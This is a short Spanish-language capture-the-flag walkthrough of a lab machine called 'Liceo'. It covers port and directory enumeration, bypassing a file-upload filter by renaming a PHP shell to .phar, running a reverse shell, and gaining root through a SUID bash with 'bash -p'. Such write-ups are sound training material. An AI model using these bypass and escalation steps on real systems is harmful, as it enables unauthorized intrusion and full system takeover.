Comenzamos con la enumeración de puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.12
❯ nmap -sCV -p21,22,80 -oN 02-targeted.txt 192.168.1.12
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-22 14:23 -03
Nmap scan report for 192.168.1.12
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-rw-r-- 1 1000 1000 191 Feb 01 14:29 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.10
| Logged in as ftp
| vsFTPd 3.0.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 68:4c:42:8d:10:2c:61:56:7b:26:c4:78:96:6d:28:15 (ECDSA)
|_ 256 7e:1a:29:d8:9b:91:44:bd:66:ff:6a:f3:2b:c7:35:65 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Liceo
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.78 secondsEn el FTP anónimo solo hay una nota:
❯ cat note.txt
Hi Matias, I have left on the web the continuations of today's work,
would you mind contiuing in your turn and make sure that the web will be secure?
Above all, we dont't want intruders...Enumeramos con gobuster:
❯ gobuster dir -u 'http://192.168.1.12' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,gif,png -r
...
/index.html (Status: 200) [Size: 21487]
/images (Status: 200) [Size: 6715]
/uploads (Status: 200) [Size: 743]
/upload.php (Status: 200) [Size: 371]
/css (Status: 200) [Size: 1746]
/js (Status: 200) [Size: 1347]
...Hay un formulario de subida. La subida de .php falla, pero renombrando a .phar tenemos éxito. Accedemos a http://192.168.1.12/uploads/, ejecutamos la reverse shell y obtenemos la primera flag.
Para escalar a root, comprobamos los permisos de /bin/bash:
bash-5.1$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1396520 Jan 6 2022 /bin/bashBash tiene el bit SUID, así que basta con lanzarlo con -p para obtener una shell de root:
bash-5.1$ bash -p
whoami
rootObtenemos nuestra flag.
Fin.